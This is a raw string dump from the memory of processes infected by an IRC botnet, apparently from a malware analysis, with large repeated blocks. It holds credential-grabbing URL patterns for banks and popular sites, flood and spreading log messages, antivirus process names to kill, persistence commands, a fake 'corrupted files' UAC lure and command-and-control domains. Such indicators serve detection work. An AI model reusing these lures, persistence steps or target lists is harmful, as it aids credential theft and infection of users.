*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%System%\wbem\wmiprvse.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

Explorer.EXE_1572_rwx_00FF0000_00001000:

dq.xxyzabsprox333.com

ws2_32.dll

advapi32.dll

Explorer.EXE_1572_rwx_01E30000_00002000:

C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-16678766\a5456663.exe

Explorer.EXE_1572_rwx_01EA0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%WinDir%\Explorer.EXE

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\explorer.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

Explorer.EXE_1572_rwx_01EF0000_00027000:

.text

`.rdata

@.data

.rsrc

@.reloc

PSSSSSSh

PSSVSSh

RPVSSh

PSSh(

PSSh#

PSSh'

PSSh&

PSSh*

9p.uV

Explorer.EXE_1572_rwx_01F18000_0006D000:

Opera/9.00 (Windows NT 5.1; U; en)

Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)

Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)

Opera 9.4 (Windows NT 6.1; U; en)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)

SbieDll.dll

Software\Classes\CLSID\%s\X

Software\Classes\CLSID\%s\X\%s

0xX

SB:0xX

G:%s_0xX_%c:%s_v1$

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u

IEXPLORE.EXE

IE.HTTP

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

IE.HTTPS

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice

IE.AssocFile.HTM

HTTP\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s

Psapi.dll

%s\%s

Software\Adobe\Acrobat Reader\%s\Privileged

mscoree.dll

HARDWARE\DESCRIPTION\System\CentralProcessor\%u

SOFTWARE\Microsoft\Windows NT\CurrentVersion

nspr4.dll

nss3.dll

Urlmon.dll

URLDownloadToFileW

Netapi32.dll

76487-640-1457236-23837

76487-337-8429955-22614

76487-644-3177037-23510

76497-640-6308873-23835

55274-640-2673064-23950

76487-640-8834005-23195

76487-640-0716662-23535

76487-644-8648466-23106

00426-293-8170032-85146

76487-341-5883812-22420

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup

{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}

snxhk.dll

comctl32.dll

ZwSetValueKey

ZwDeleteValueKey

SOFTWARE\%s

update.microsoft.com

microsoft.com

windowsupdate.microsoft.com

JOIN

PRIVMSG

.rdata

cmd_option.%s

/c %s

cmd.exe

msvcrt.dll

--x-x-x-xx

Content-Type: multipart/form-data; boundary=x-x-x-xx

Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"

%s?action=up&g=%s

xul.dll

Content-Type: application/x-www-form-urlencoded

HTTP/1.1

?pid=%d

?page=%d

?id=%u

%s=%u&%s=%s

%s=%s&%s=%u

&%s=%s

&%s%u=

&%s%hu=

&%s=_%u

%d|%s|%s|%s

.info

httpget

GET /%s HTTP/1.1

Host: %s

Content-Length: %d

Accept: %s

Accept-Language: %s

Accept-Charset: %s

Accept-Encoding: %s

User-Agent: %s

Referer: %s

Connection: %s

http://

iexplore.exe

firefox.exe

tbb-firefox.exe

%s:%hu

windowsupdate

SSH2_MSG_KEXINIT

SSH2_MSG_DISCONNECT

SSH2_MSG_USERAUTH_SUCCESS

http://%s%s/image.php?id=%s

TaskDialogIndirect

http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535

ÐxX

ntdll.dll

kernel32.dll

secur32.dll

crypt32.dll

user32.dll

advapi32.dll

wininet.dll

shell32.dll

shlwapi.dll

ole32.dll

version.dll

sfc.dll

dnsapi.dll

ws2_32.dll

8"808]9|9

9%9 919<9

=(=/=6==={=

4 4?4^4}4

6o6g6r6w6

9 9$9(90949

.text

`.rdata

@.data

.rsrc

Invalid parameter passed to C runtime function.

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

EnumDesktopWindows

SetWindowsHookExA

SetProcessWindowStation

SetWindowsHookW

UnregisterHotKey

ExitWindowsEx

GetAsyncKeyState

EnumWindows

GetKeyState

USER32.dll

SHELL32.dll

RegCloseKey

RegQueryInfoKeyA

RegOpenKeyExW

RegOpenKeyExA

RegCreateKeyW

RegCreateKeyA

ADVAPI32.dll

GDI32.dll

SHLWAPI.dll

GetProcessHeap

GetCPInfo

KERNEL32.dll

i%fOLK

>Z.DI

Q}.UbU

%S.Ny

J[ÿF

#Q.RP

[.ivH

|:v%X

ym.sg

X*.x.aVkyJ1

.Po7VE

M%Doz

,v.XS

Software\Classes\CLSID\%S

G:%S_0xX

chrome.exe

opera.exe

safari.exe

maxthon.exe

:Mozilla\Firefox\Profiles

cookies.sqlite

%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*

%s\winsxs\%s\comctl32.dll

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s

%s:*:Enabled

avcuf32.dll

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

prstrui.exe

Windows Defender

MpClient.dll

Windows Defender\MSASCui.exe

MpSvc.dll

msseces.exe

MsMpEng.exe

MSASCui.exe

MpAsDesc.dll

MsMpLics.dll

avgui.exe

avgidsagent.exe

avgwdsvc.exe

avgdiagex.exe

avgmfapx.exe

avgupd.exe

avgcfgex.exe

avgnt.exe

avguard.exe

avshadow.exe

avcenter.exe

update.dll

updaterc.dll

usrreq.exe

ccsvchst.exe

symerr.exe

NIS.exe

NAV.exe

navw32.exe

avastui.exe

AvastEmUpdate.exe

ashUpd.exe

WRSA.exe

zatray.exe

ForceField.exe

updating.dll

fshoster32.exe

fsaua.dll

PSUNMain.exe

PSUAService.exe

PSANHost.exe

PSUNScan.dll

epavjobs.exe

AVENGINE.exe

Upgrader.exe

adaware.exe

BullGuard.exe.manifest

BullGuardUpdate.exe

BullGuard.exe

BullGuardScanner.exe

BullGuardBhvScanner.exe

BullGuardUpdate2.exe

BgScan.exe

BgScanEngine.dll

.manifest

updater.exe

Backup\RSD\RSSetup\updater.exe

RsTray.exe

RavMonD.exe

RsMgrSvc.exe

rsmain.exe

RsScan.dll

RsTray.dll

mbamgui.exe

mbam.exe

pctsGui.exe

pctsAuxs.exe

pctsSvc.exe

Update.exe

UpdateHlpr.dll

Definitions\vcore.dll

sbamui.exe

SBAMTray.exe

updater_client_mod.dll

FProtTray.exe

FPWin.exe

scf.dat

ALUpdate.exe

update_tmp.exe

arcaclean.exe

BavUpdater.exe

rcfp.exe

CLPSLA.exe

op_mon.exe

niu.exe

K7TSUpdT.exe

sguardxup.exe

ccupdate.exe

caupdate.dll

a2guard.exe

a2start.exe

a2service.exe

AVKTray.exe

GDSC.exe

AVK.exe

GDFirewallTray.exe

Bka.exe

BLuPro.exe

BkavSystemServer.exe

BkavService.exe

LiveUpdate.dll

LiveConnect.dll

BaseFile\Bkav\LiveUpdate.dll

V3Lite.exe

ASDSvc.exe

autoup.exe

downloader.exe

%s.config

updatesrv.exe

updatemgr.dll

egui.exe

ekrn.exe

x86\ekrn.exe

uWinMgr.exe

coreServiceShell.exe

uiSeAgnt.exe

uiWatchDog.exe

plugins\plugUpdater.dll

UiFrmwrk\uiUpdateTray.exe

coreFrameworkHost.exe

mcagent.exe

McSvHost.exe

McUICnt.exe

McPvTray.exe

mcui_exe

mcpltui_exe

mcshell.exe

mcupdmgr.exe

mcupdate.exe

mcshield.exe

mcupdui.dll

McAPExe.exe

.config

Image File Execution Options\%s

SYSTEM\CurrentControlSet\services\%s

%c:\ntusbdriver.sys

%c:\*p.exe

%c:\%s

p.exe

%WinDir%\explorer.exe

/C start /d. %s&"%s"

%COMSPEC%

%WinDir%\system32\shell32.dll

%c:\%s.lnk

VisthAux.exe

explorer.exe

t.minecraft

Works! PID: %d, Name: %s

cmdvirth

%s%s\X

tcp://

svchost.exe

csrss.exe

lsass.exe

smss.exe

wscript.exe

cscript.exe

vbc.exe

rundll32.exe

regsvr32.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

winlogon.exe

services.exe

%s\x.lnk

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s

desktop.ini

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

wintrust.dll

chrome.dll

Applications\iexplore.exe\shell\open\command

%s_xx

x.zip

Navw32.exe

SysInspector.exe

avscan.exe

mfefire.exe

wuauclt.exe

WerFault.exe

lFileZilla\sitemanager.xml

port

Sites.dat

Quick.dat

%s\3\%s

%s\4\%s

spoolsv.exe

steam.exe

skype.exe

origin.exe

dwm.exe

tapi3.dll

/C copy "%s" "%s"

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

Windows Update Service

"%s" /%s

Software\Microsoft\Windows\CurrentVersion\RunOnce

/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST

schtasks.exe

/DELETE /TN "Windows Update Check - 0xX" /F

\Windows\Explorer.exe

Low_X

%s.manifest

PendingFileRenameOperations

%s\X

Windows\CurrentVersion\Run

CurrentVersion\Windows

Windows NT\CurrentVersion\Image File Execution Options\%s

Windows has encountered a corrupted folder on your hard drive

Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.

Corrupted folder: %s

Corrupted file count: %d

%s

/c start "" "%s" /%s "%s"

shell32,ShellExec_RunDLL "%s" /%s "%s"

You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.

Windows 3.1 Update Service

%s:Zone.Identifier

%s\X.pif

KERNEL32.DLL

KERNELBASE.DLL

kernelbase.dll

1.2.3.4532

YandexDiskStarter.exe

Yandex.Disk

Explorer.EXE_1572_rwx_01FD0000_00001000:

b.xxyzabsprox333.com

ws2_32.dll

advapi32.dll

Explorer.EXE_1572_rwx_022F0000_00002000:

C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-19545466\b849543.exe

jqs.exe_1592_rwx_010C0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

